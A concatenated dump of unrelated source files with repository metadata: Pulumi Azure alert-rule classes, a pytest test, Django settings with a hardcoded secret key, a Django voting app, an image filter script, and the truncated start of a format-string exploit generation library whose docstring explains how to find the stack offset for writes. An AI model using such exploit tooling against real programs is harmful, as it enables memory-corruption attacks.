@pulumi.getter(name="lastModifiedAt")
def last_modified_at(self) -> str:
"""
Last updated time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "last_modified_at")
@property
@pulumi.getter(name="lastModifiedBy")
def last_modified_by(self) -> str:
"""
Last modified by user name.
"""
return pulumi.get(self, "last_modified_by")
@property
@pulumi.getter
def type(self) -> str:
"""
Indicates type of action rule
Expected value is 'Diagnostics'.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def conditions(self) -> Optional['outputs.ConditionsResponse']:
"""
conditions on which alerts will be filtered
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
Description of action rule
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def scope(self) -> Optional['outputs.ScopeResponse']:
"""
scope on which action rule will apply
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Indicates if the given action rule is enabled or disabled
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ScopeResponse(dict):
"""
Target scope for a given action rule. By default scope will be the subscription. User can also provide list of resource groups or list of resources from the scope subscription as well.
"""
def __init__(__self__, *,
scope_type: Optional[str] = None,
values: Optional[Sequence[str]] = None):
"""
Target scope for a given action rule. By default scope will be the subscription. User can also provide list of resource groups or list of resources from the scope subscription as well.
:param str scope_type: type of target scope
:param Sequence[str] values: list of ARM IDs of the given scope type which will be the target of the given action rule.
"""
if scope_type is not None:
pulumi.set(__self__, "scope_type", scope_type)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="scopeType")
def scope_type(self) -> Optional[str]:
"""
type of target scope
"""
return pulumi.get(self, "scope_type")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
list of ARM IDs of the given scope type which will be the target of the given action rule.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SuppressionConfigResponse(dict):
"""
Suppression logic for a given action rule
"""
def __init__(__self__, *,
recurrence_type: str,
schedule: Optional['outputs.SuppressionScheduleResponse'] = None):
"""
Suppression logic for a given action rule
:param str recurrence_type: Specifies when the suppression should be applied
:param 'SuppressionScheduleResponseArgs' schedule: suppression schedule configuration
"""
pulumi.set(__self__, "recurrence_type", recurrence_type)
if schedule is not None:
pulumi.set(__self__, "schedule", schedule)
@property
@pulumi.getter(name="recurrenceType")
def recurrence_type(self) -> str:
"""
Specifies when the suppression should be applied
"""
return pulumi.get(self, "recurrence_type")
@property
@pulumi.getter
def schedule(self) -> Optional['outputs.SuppressionScheduleResponse']:
"""
suppression schedule configuration
"""
return pulumi.get(self, "schedule")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SuppressionResponse(dict):
"""
Action rule with suppression configuration
"""
def __init__(__self__, *,
created_at: str,
created_by: str,
last_modified_at: str,
last_modified_by: str,
suppression_config: 'outputs.SuppressionConfigResponse',
type: str,
conditions: Optional['outputs.ConditionsResponse'] = None,
description: Optional[str] = None,
scope: Optional['outputs.ScopeResponse'] = None,
status: Optional[str] = None):
"""
Action rule with suppression configuration
:param str created_at: Creation time of action rule. Date-Time in ISO-8601 format.
:param str created_by: Created by user name.
:param str last_modified_at: Last updated time of action rule. Date-Time in ISO-8601 format.
:param str last_modified_by: Last modified by user name.
:param 'SuppressionConfigResponseArgs' suppression_config: suppression configuration for the action rule
:param str type: Indicates type of action rule
Expected value is 'Suppression'.
:param 'ConditionsResponseArgs' conditions: conditions on which alerts will be filtered
:param str description: Description of action rule
:param 'ScopeResponseArgs' scope: scope on which action rule will apply
:param str status: Indicates if the given action rule is enabled or disabled
"""
pulumi.set(__self__, "created_at", created_at)
pulumi.set(__self__, "created_by", created_by)
pulumi.set(__self__, "last_modified_at", last_modified_at)
pulumi.set(__self__, "last_modified_by", last_modified_by)
pulumi.set(__self__, "suppression_config", suppression_config)
pulumi.set(__self__, "type", 'Suppression')
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if description is not None:
pulumi.set(__self__, "description", description)
if scope is not None:
pulumi.set(__self__, "scope", scope)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> str:
"""
Creation time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter(name="createdBy")
def created_by(self) -> str:
"""
Created by user name.
"""
return pulumi.get(self, "created_by")
@property
@pulumi.getter(name="lastModifiedAt")
def last_modified_at(self) -> str:
"""
Last updated time of action rule. Date-Time in ISO-8601 format.
"""
return pulumi.get(self, "last_modified_at")
@property
@pulumi.getter(name="lastModifiedBy")
def last_modified_by(self) -> str:
"""
Last modified by user name.
"""
return pulumi.get(self, "last_modified_by")
@property
@pulumi.getter(name="suppressionConfig")
def suppression_config(self) -> 'outputs.SuppressionConfigResponse':
"""
suppression configuration for the action rule
"""
return pulumi.get(self, "suppression_config")
@property
@pulumi.getter
def type(self) -> str:
"""
Indicates type of action rule
Expected value is 'Suppression'.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def conditions(self) -> Optional['outputs.ConditionsResponse']:
"""
conditions on which alerts will be filtered
"""
return pulumi.get(self, "conditions")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
Description of action rule
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def scope(self) -> Optional['outputs.ScopeResponse']:
"""
scope on which action rule will apply
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
Indicates if the given action rule is enabled or disabled
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SuppressionScheduleResponse(dict):
"""
Schedule for a given suppression configuration.
"""
def __init__(__self__, *,
end_date: Optional[str] = None,
end_time: Optional[str] = None,
recurrence_values: Optional[Sequence[int]] = None,
start_date: Optional[str] = None,
start_time: Optional[str] = None):
"""
Schedule for a given suppression configuration.
:param str end_date: End date for suppression
:param str end_time: End date for suppression
:param Sequence[int] recurrence_values: Specifies the values for recurrence pattern
:param str start_date: Start date for suppression
:param str start_time: Start time for suppression
"""
if end_date is not None:
pulumi.set(__self__, "end_date", end_date)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if recurrence_values is not None:
pulumi.set(__self__, "recurrence_values", recurrence_values)
if start_date is not None:
pulumi.set(__self__, "start_date", start_date)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter(name="endDate")
def end_date(self) -> Optional[str]:
"""
End date for suppression
"""
return pulumi.get(self, "end_date")
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[str]:
"""
End date for suppression
"""
return pulumi.get(self, "end_time")
@property
@pulumi.getter(name="recurrenceValues")
def recurrence_values(self) -> Optional[Sequence[int]]:
"""
Specifies the values for recurrence pattern
"""
return pulumi.get(self, "recurrence_values")
@property
@pulumi.getter(name="startDate")
def start_date(self) -> Optional[str]:
"""
Start date for suppression
"""
return pulumi.get(self, "start_date")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[str]:
"""
Start time for suppression
"""
return pulumi.get(self, "start_time")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| [
"noreply@github.com"
] | MisinformedDNA.noreply@github.com |
3c7cc2fd0685ea1563de87c1073126f4aa463a33 | 3fa613a340292b852aa083921f43a640d5e80e8f | /day_4/test_advent_coins.py | 27a737ce195e7875b2bc552644dd21c836ae6f0e | [] | no_license | arseny-tsyro/advent_of_code_python | e7e91d28aaaf98655af570f1e30d3c71b374c733 | 09b9a474974da96c3787ab655e04fb24dcaa7dae | refs/heads/master | 2016-08-12T03:32:51.184955 | 2015-12-14T12:35:49 | 2015-12-14T12:35:56 | 47,346,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | import pytest
from day_4.advent_coins import *
@pytest.mark.parametrize("secret_key, expected", [
("abcdef", 609043),
("pqrstuv", 1048970)
])
def test_mine(secret_key, expected):
result = mine(secret_key)
assert result == expected
| [
"arseny-tsyro@ya.ru"
] | arseny-tsyro@ya.ru |
db52871b54ababab237eabf4d0ff0d605983ac6e | df7d6a55af3c6b9fbb39079a438ac9a6f67666de | /learning_site/settings.py | 2041e6362523271c092786856056b12808566dbf | [] | no_license | Leziak/Django-Blog- | 5845ead35f1fac9cefc834fa22c8da7119bbee60 | 428ac6a8a102d2484337465ac2d44a237f2fdc9d | refs/heads/master | 2020-04-01T08:02:16.313365 | 2018-10-14T20:14:07 | 2018-10-14T20:14:07 | 153,014,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,348 | py | """
Django settings for learning_site project.
Generated by 'django-admin startproject' using Django 2.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'vhhzeatdyvfzn*0cb047*vsed%3^tac51(#0s*(-&hjzj$yu9m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'blog.apps.BlogConfig',
'users.apps.UsersConfig',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'learning_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'learning_site.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
LOGIN_REDIRECT_URL = 'blog-home'
LOGIN_URL = 'login'
| [
"samo.majoros@gmail.com"
] | samo.majoros@gmail.com |
338d236cc4b9f3b36095c2d96499851af1f4b6e3 | fc837a86b004d5d6753c51b5ecef9322d37464de | /votee/views.py | 353d2a13596836d529588f2937f2212e2b1a0685 | [] | no_license | matfystutor/tutorgf | 05c9c2da6b58c27f3bf62ccf88ce789dc31e251b | 5656c066721db4323aa3a05e57ab613a5effb1c5 | refs/heads/master | 2023-01-11T05:25:32.176317 | 2020-11-02T15:57:18 | 2020-11-02T15:57:18 | 309,121,186 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,803 | py | import datetime
import json
import time
from django import forms
from django.http import Http404, HttpResponseForbidden, HttpResponseRedirect
from django.template.defaultfilters import slugify
from django.urls import reverse
from django.utils import timezone
from django.views.generic import FormView, TemplateView
from votee import models
class SingleElectionMixin:
def get_election(self) -> models.Election:
try:
return models.Election.objects.get(slug=self.kwargs["election"])
except models.Election.DoesNotExist:
raise Http404
class SinglePollMixin(SingleElectionMixin):
def get_poll(self) -> models.Poll:
try:
return models.Poll.objects.get(
election__slug=self.kwargs["election"], slug=self.kwargs["poll"]
)
except models.models.Poll.DoesNotExist:
raise Http404
class ElectionCreateForm(forms.Form):
name = forms.CharField()
polls = forms.CharField(
required=False,
widget=forms.Textarea,
)
def clean_polls(self):
v = self.cleaned_data["polls"]
if not v.strip():
return [], []
polls = []
options = []
if v.strip().startswith("{"):
parsed = json.loads(v)
for k, v in parsed.items():
assert isinstance(k, str)
assert isinstance(v, list)
p = models.Poll(name=k, slug=slugify(k))
polls.append(p)
for n in v:
assert isinstance(n, str)
options.append(models.PollOption(poll=p, name=n))
else:
for line in v.splitlines():
if not line.strip():
continue
indented = line.lstrip() != line
if indented:
if not polls:
raise Exception("Indented line without a leading poll name")
name = "" if line.strip() == "(blank)" else line.strip()
options.append(models.PollOption(poll=polls[-1], name=name))
else:
if polls and (not options or options[-1].poll is not polls[-1]):
raise Exception("Poll with no options")
name = line.strip()
polls.append(models.Poll(name=name, slug=slugify(name)))
if not polls:
raise Exception("No polls")
if not options or options[-1].poll is not polls[-1]:
raise Exception("Poll with no options")
return polls, options
class ElectionCreate(FormView):
template_name = "votee/election_create.html"
form_class = ElectionCreateForm
def form_valid(self, form):
if not self.request.user.is_superuser:
form.add_error(None, "You must be a superuser to create a new election")
return self.form_invalid(form)
polls, options = form.cleaned_data["polls"]
e = models.Election.objects.create(
name=form.cleaned_data["name"],
slug=slugify(form.cleaned_data["name"]),
)
for p in polls:
p.election = e
p.save()
for o in options:
o.poll = o.poll
o.save()
url = (
reverse("election_admin", kwargs={"election": e.slug})
+ "?a="
+ e.get_admin_key()
)
return HttpResponseRedirect(url)
class ElectionDetail(TemplateView, SingleElectionMixin):
template_name = "votee/election_detail.html"
class ElectionAdmin(FormView, SingleElectionMixin):
template_name = "votee/election_admin.html"
def dispatch(self, request, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.election = self.get_election()
key = self.request.GET.get("a") or ""
if not self.election.validate_admin_key(key):
if request.user.is_superuser:
url = (
reverse("election_admin", kwargs={"election": self.election.slug})
+ "?a="
+ self.election.get_admin_key()
)
return HttpResponseRedirect(url)
return HttpResponseForbidden("<h1>Invalid admin key</h1>")
return super().dispatch(request, *args, **kwargs)
def get_form(self) -> forms.Form:
self.election = self.get_election()
self.polls = self.election.polls()
f = forms.Form(**self.get_form_kwargs())
f.fields["name"] = forms.CharField(
initial=self.election.name,
)
self.rows = []
for i, p in enumerate(self.polls):
prefix = f"p{p.id}_"
f.fields[prefix + "order"] = forms.IntegerField(
initial=i + 1,
)
ac = p.accepting_votes
f.fields[prefix + "delete"] = forms.BooleanField(
required=False,
disabled=ac,
)
f.fields[prefix + "name"] = forms.CharField(
initial=p.name,
disabled=ac,
)
f.fields[prefix + "votes"] = forms.IntegerField(
initial=1,
disabled=ac,
)
self.rows.append(
(
p,
prefix + "order",
prefix + "delete",
prefix + "name",
prefix + "votes",
)
)
f.fields["new_polls"] = forms.CharField(widget=forms.Textarea, required=False)
return f
def get_context_data(self, **kwargs):
context_data = super().get_context_data(election=self.election, **kwargs)
form = context_data["form"]
context_data["rows"] = [
[form[k] for k in keys] + [p.get_admin_url()] for p, *keys in self.rows
]
poll_export = "\n\n".join(
"%s\n\n%s"
% (
poll.name,
"\n".join(" %s" % (o.name or "(blank)") for o in poll.options()),
)
for poll in self.polls
)
context_data["poll_export"] = poll_export
return context_data
def form_invalid(self, form):
print("Invalid")
return super().form_invalid(form)
def form_valid(self, form):
print("Valid")
new_order = []
to_delete = []
to_save = []
for p, k_order, k_delete, k_name, k_votes in self.rows:
ac = p.accepting_votes
if not ac and form.cleaned_data[k_delete]:
to_delete.append(p)
continue
new_order.append((form.cleaned_data[k_order], p))
if not ac:
continue
if (
p.votes_per_ballot != form.cleaned_data[k_votes]
or p.name != form.cleaned_data[k_name]
):
p.votes_per_ballot = form.cleaned_data[k_votes]
p.name = form.cleaned_data[k_name]
to_save.append(p)
order_slugs = [p.slug for _, p in sorted(new_order)]
for n in form.cleaned_data["new_polls"].splitlines():
name = n.strip()
if not name:
continue
slug = slugify(name)
order_slugs.append(slug)
p = models.Poll(
election=self.election,
name=name,
slug=slug,
)
p.votes_per_ballot = 1
p.accepting_votes = False
p.number_of_ballots = 0
to_save.append(p)
for o in to_delete:
o.delete()
for o in to_save:
o.save()
self.election.poll_order = order_slugs
self.election.name = form.cleaned_data["name"]
self.election.save()
url = (
reverse("election_admin", kwargs={"election": self.election.slug})
+ "?a="
+ self.election.get_admin_key()
)
return HttpResponseRedirect(url)
class PollDetail(FormView, SinglePollMixin):
template_name = "votee/poll_detail.html"
def get_form(self) -> forms.Form:
self.poll = self.get_poll()
key = self.request.GET.get("s")
if key is not None:
self.ballot_index = self.poll.validate_ballot(key)
# If "key" was invalid, ballot_index is simply None
else:
self.ballot_index = None
self.key_error = bool(key and self.ballot_index is None)
self.already_voted = (
self.ballot_index is not None
and models.UsedBallot.objects.filter(
poll=self.poll, ballot_index=self.ballot_index
).exists()
)
self.can_vote = self.ballot_index is not None
self.options = self.poll.options()
f = forms.Form(**self.get_form_kwargs())
for i in range(1, self.poll.votes_per_ballot + 1):
choices = [("0", "---")] + [(str(o.id), str(o)) for o in self.options]
f.fields["option%s" % i] = forms.ChoiceField(
choices=choices, disabled=not self.can_vote
)
return f
def get_context_data(self, **kwargs):
context_data = super().get_context_data(**kwargs)
s = self.poll.settings
voting_interval = s["voting_interval"]
if voting_interval:
next_vote = s["voting_start"] - time.time()
if next_vote < 0:
next_vote %= voting_interval
else:
next_vote = 0
context_data.update(
just_voted=bool(self.request.GET.get("voted")),
options=self.options,
ballot_index=None if self.ballot_index is None else self.ballot_index + 1,
already_voted=self.already_voted,
poll=self.poll,
ac=s["accepting_votes"],
next_vote=next_vote,
voting_interval=voting_interval,
)
return context_data
def form_valid(self, form):
if self.already_voted:
form.add_error(None, "You have already voted in this poll")
return self.form_invalid(form)
if not self.can_vote:
form.add_error(None, "Your voting key is not valid")
return self.form_invalid(form)
if not self.poll.accepting_votes:
form.add_error(
None, "Sorry, but the poll closed before we received your vote!"
)
return self.form_invalid(form)
assert self.ballot_index is not None
options = {str(o.id): o for o in self.poll.options()}
chosen_option_ids = [
form.cleaned_data["option%s" % i]
for i in range(1, self.poll.votes_per_ballot + 1)
]
chosen_options = [options.get(i) for i in chosen_option_ids]
missing_options = any(o is None for o in chosen_options)
if missing_options:
form.add_error(None, "Please fill out the entire form")
return self.form_invalid(form)
non_blank_options = [o for o in chosen_options if o.name != ""]
dupes = len(non_blank_options) - len(set(non_blank_options))
if dupes:
form.add_error(None, "You cannot vote for the same option more than once")
return self.form_invalid(form)
models.use_ballot(self.poll, self.ballot_index, chosen_options)
url = (
reverse(
"poll_detail",
kwargs={"election": self.get_election().slug, "poll": self.poll.slug},
)
+ "?voted=1"
)
return HttpResponseRedirect(url)
class PollAdmin(FormView, SinglePollMixin):
template_name = "votee/poll_admin.html"
def dispatch(self, request, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.poll = self.get_poll()
key = self.request.GET.get("a") or ""
if not self.poll.election.validate_admin_key(key):
if request.user.is_superuser:
base_url = reverse(
"poll_admin",
kwargs={
"election": self.poll.election.slug,
"poll": self.poll.slug,
},
)
url = base_url + "?a=" + self.poll.election.get_admin_key()
return HttpResponseRedirect(url)
return HttpResponseForbidden("<h1>Invalid admin key</h1>")
return super().dispatch(request, *args, **kwargs)
def get_form(self) -> forms.Form:
f = forms.Form(**self.get_form_kwargs())
s = self.poll.settings
ac = s["accepting_votes"]
if s["voting_start"]:
self.voting_start = timezone.make_aware(
datetime.datetime.utcfromtimestamp(s["voting_start"]),
timezone=timezone.utc,
)
next_vote = self.voting_start - timezone.now().replace(microsecond=0)
self.first_vote = (
"(in %s)" % next_vote
if next_vote.total_seconds() > 0
else "(%s ago)" % (-next_vote)
)
else:
self.voting_start = ""
self.first_vote = ""
voting_interval = s["voting_interval"]
self.options = self.poll.options()
any_votes = any(bool(o.count) for o in self.options)
f.fields["name"] = forms.CharField(
initial=self.poll.name,
)
f.fields["votes"] = forms.IntegerField(
initial=self.poll.votes_per_ballot,
)
f.fields["ac"] = forms.BooleanField(
initial=ac,
required=False,
)
f.fields["next_vote"] = forms.FloatField(
required=False,
)
f.fields["voting_interval"] = forms.FloatField(
initial=voting_interval or None,
required=False,
)
blank_options = [o for o in self.options if not o.name]
f.fields["blank"] = forms.BooleanField(
initial=bool(blank_options),
required=False,
)
self.rows = []
for i, o in enumerate(self.options):
if not o.name:
continue
prefix = f"o{o.id}_"
f.fields[prefix + "order"] = forms.IntegerField(
initial=len(self.rows) + 1,
)
f.fields[prefix + "delete"] = forms.BooleanField(
required=False,
disabled=ac or any_votes,
)
f.fields[prefix + "name"] = forms.CharField(
initial=o.name,
disabled=ac or any_votes,
)
self.rows.append((o, prefix + "order", prefix + "delete", prefix + "name"))
f.fields["new_options"] = forms.CharField(widget=forms.Textarea, required=False)
f.fields["ballots"] = forms.IntegerField(
initial=self.poll.number_of_ballots,
min_value=0,
)
return f
def get_context_data(self, **kwargs):
context_data = super().get_context_data(**kwargs)
form = context_data["form"]
rows = [[form[k] for k in keys] for o, *keys in self.rows]
reverse_args = {"election": self.poll.election.slug, "poll": self.poll.slug}
url = (
reverse(
"poll_admin",
kwargs=reverse_args,
)
+ "?a="
+ self.poll.election.get_admin_key()
+ "&results=1"
)
ballot_url = reverse("poll_detail", kwargs=reverse_args) + "?s="
ballots = [
ballot_url + b
for b in self.poll.get_ballots(0, self.poll.number_of_ballots)
]
used_ballots = models.UsedBallot.objects.filter(poll=self.poll).count()
vote_count = sum(o.count for o in self.options)
context_data.update(
poll=self.poll,
rows=rows,
options=self.options,
vote_count=vote_count,
used_ballots=used_ballots,
ballots=ballots,
show_results=bool(self.request.GET.get("results")),
show_results_link=url,
voting_start=self.voting_start,
first_vote=self.first_vote,
)
return context_data
def form_valid(self, form):
new_order = []
to_delete = []
to_save = []
ac = self.poll.accepting_votes
for o in self.options:
if o.name:
continue
if new_order or not form.cleaned_data["blank"]:
# Keep 0 blanks if "blank" is not checked,
# and keep 1 blank if "blank" is checked.
to_delete.append(o)
continue
# Insert blank as the first option
new_order.append((float("-inf"), o))
break
if form.cleaned_data["blank"] and not new_order:
b = models.PollOption(poll=self.poll, name="")
to_save.append(b)
new_order.append((float("-inf"), b))
for o, k_order, k_delete, k_name in self.rows:
if not ac and form.cleaned_data[k_delete]:
to_delete.append(o)
continue
new_order.append((form.cleaned_data[k_order], o))
if not ac:
continue
if o.name != form.cleaned_data[k_name]:
o.name = form.cleaned_data[k_name]
to_save.append(o)
order = [o for _, o in sorted(new_order)]
for n in form.cleaned_data["new_options"].splitlines():
name = n.strip()
if not name:
continue
o = models.PollOption(
poll=self.poll,
name=name,
)
order.append(o)
to_save.append(o)
for o in to_delete:
o.delete()
for o in to_save:
o.save()
self.poll.accepting_votes = form.cleaned_data["ac"]
self.poll.option_order = [o.id for o in order]
self.poll.votes_per_ballot = form.cleaned_data["votes"]
self.poll.number_of_ballots = form.cleaned_data["ballots"]
self.poll.name = form.cleaned_data["name"]
if form.cleaned_data["next_vote"]:
self.poll.voting_start = round(time.time() + form.cleaned_data["next_vote"])
self.poll.voting_interval = form.cleaned_data["voting_interval"] or 0
self.poll.save()
url = (
reverse(
"poll_admin",
kwargs={"election": self.poll.election.slug, "poll": self.poll.slug},
)
+ "?a="
+ self.poll.election.get_admin_key()
)
return HttpResponseRedirect(url)
| [
"m@git.strova.dk"
] | m@git.strova.dk |
9587742f65d79728af75fdf6856fe7cf09ff627f | c922392e752d16bbc4cbddd7d721b9c4fed4ae49 | /hw6/test.py | 82b61dda5358c9b7fec4e309745404accb6f150b | [] | no_license | dcan07/DeepLearning | 078863c4186c39e3d168d85c0d183e93803a53ff | c289d71c73bba81b46650c89b415ae2570d98545 | refs/heads/master | 2022-12-14T16:05:44.724140 | 2020-09-21T19:02:46 | 2020-09-21T19:02:46 | 297,404,840 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,246 | py |
import numpy as np
import tensorflow as tf
from tensorflow import keras
#from tensorflow.keras import layers
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,LeakyReLU
from keras.layers import Activation, Dropout, Flatten, Dense,BatchNormalization
#from tensorflow.keras.layers import BatchNormalization
from keras import backend as K
import numpy as np
import random as python_random
print('tensorflow: %s' % tf.__version__)
import sys
np.random.seed(123)
python_random.seed(123)
tf.random.set_seed(1234)
#afs paths
testdir=str(sys.argv[1])
labeldir=str(sys.argv[2])
modelname=str(sys.argv[3])
#load datasets
test=np.load(testdir)
labels=np.load(labeldir)
#load model
model = keras.models.load_model(modelname)
if K.image_data_format() == 'channels_first':
test = test.reshape(test.shape[0], 3, 112, 112)
else:
test = test.reshape(test.shape[0], 112, 112, 3)
#scale to -1 to 1
test=(test*2)-1
predictions = model.predict(test)
misclassification=0
for i in range(len(labels)):
pred=np.argmax(predictions[i,])
if(pred!=labels[i]):
misclassification+=1
print('Misclassification error: ',misclassification/len(labels))
| [
"noreply@github.com"
] | dcan07.noreply@github.com |
024f9ad1d7193ca47a26fc46b141fe699fd82ba7 | 396be02dd2c7394b6c599dbdb27da51b18a58cd6 | /halfAndhalf.py | a71bb47944a2dfb2f29383c73d57dba69d622f39 | [] | no_license | jamygarcia/Girls-Who-Code | e820c5761de27414142081f05cd2966b6958d0fc | 1f62a547170edac6b6115db92f5e9a9d12811e75 | refs/heads/master | 2020-12-03T03:59:09.626211 | 2017-07-14T22:48:43 | 2017-07-14T22:48:43 | 95,800,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,212 | py | from PIL import Image
##FUCTIONS
#Import the image and make the pixel
myImage = Image.open("ele2.jpg")
imageData = myImage.getdata()
pixelList = list(imageData)
newPixelList =[]
length = len(pixelList)
halfway = length//2
counter = 0
def negative(pixel):
red = pixel[0]
green = pixel[1]
blue = pixel[2]
#find the new red, green, and blue
newRed = 255 - red
newGreen = 255 - green
newBlue = 255 - blue
p = (newRed, newGreen, newBlue)
newPixelList.append(p)
def overExpose(pixel):
red = pixel[0]
green = pixel[1]
blue = pixel[2]
newRed=red*2
if newRed >255:
newRed = 255
newGreen=green*2
if newGreen >255:
newGreen = 255
newBlue=blue*2
if newBlue >255:
newBlue = 255
p = (newRed,newGreen,newBlue)
#add pixel to new pixel list
newPixelList.append(p)
for pixel in pixelList:
if (counter <= halfway):
overExpose(pixel)
else:
negative(pixel)
counter += 1
#open the image
newImage = Image.new("RGB", myImage.size)
newImage.putdata(newPixelList)
newImage.show()
| [
"noreply@github.com"
] | jamygarcia.noreply@github.com |
5644e5c0b6aa0dab0c7749c8574c9a70eebc075c | 400b0cb1f25cc2fbe80a3037c06102f40c4d2d89 | /string33.py | 575f57fac37b82880d7965f8c50047498875f63b | [] | no_license | Prithamprince/Python-programming | 4c747d306829de552e3b0c6af67cfe534a2dc2e1 | 79a0953084a01978e75d2be4db0d35ba1cf29259 | refs/heads/master | 2020-05-30T06:29:26.134906 | 2019-12-13T06:33:49 | 2019-12-13T06:33:49 | 189,580,341 | 0 | 4 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from itertools import combinations
p=input()
q=0
l=list(combinations(p,len(p)-1))
for i in range(len(l)):
if(l[i]==l[i][ ::-1]):
print("YES")
q=1
break
if(q==0):
print("NO")
| [
"noreply@github.com"
] | Prithamprince.noreply@github.com |
233e92200613c295e2d76d7b6c59aec7b7c64c4c | 4193699d0f9e9fd2c3c6580ea0a8b458055dda74 | /formatter/format.py | 02e143f0984d04b22b88d2401a9779ea1aeae8f3 | [] | no_license | zardus/old-shellphish-crap | b3c4efdcd404825e0903d140cc5b837848ef22a9 | b3cdac37204c86fba2422f9baf28edc234916d97 | refs/heads/master | 2020-05-18T15:57:07.989952 | 2013-03-29T23:47:19 | 2013-03-29T23:47:19 | 8,738,654 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,976 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = "Yan Somethingrussian <yans@yancomm.net>"
__version__ = "0.1.0"
__description__ = "An automatic format string generation library."
""" Finding the character offset:
1. Run the program
2. Provide the format string, e.g., "FORMATSTRING%n%n%n%n" as input
3. Continue/Run it (and hope that it crashes, or try again)
4. Add a breakpoint to the function it crashes on (after the function prologue)
5. Find the character offset (the pointer to the format string is on the stack,
close ot $esp; just calculate the difference)
"""
import operator
import struct
import sys
def chunk(writes, word_size=4, chunk_size=1):
""" Splits a bunch of writes into different chunks
Note: I *think* it's little-endian specific
Parameters:
writes: a list of (target, value) locations (of size word_size) to overwrite
word_size: the word size (in bytes) of the architecture (default: 4)
chunk_size: the size (in bytes) of the desired write chunks (default: 1)
"""
byte_writes = []
offsets = range(8 * word_size, -1, -8 * chunk_size)[1:]
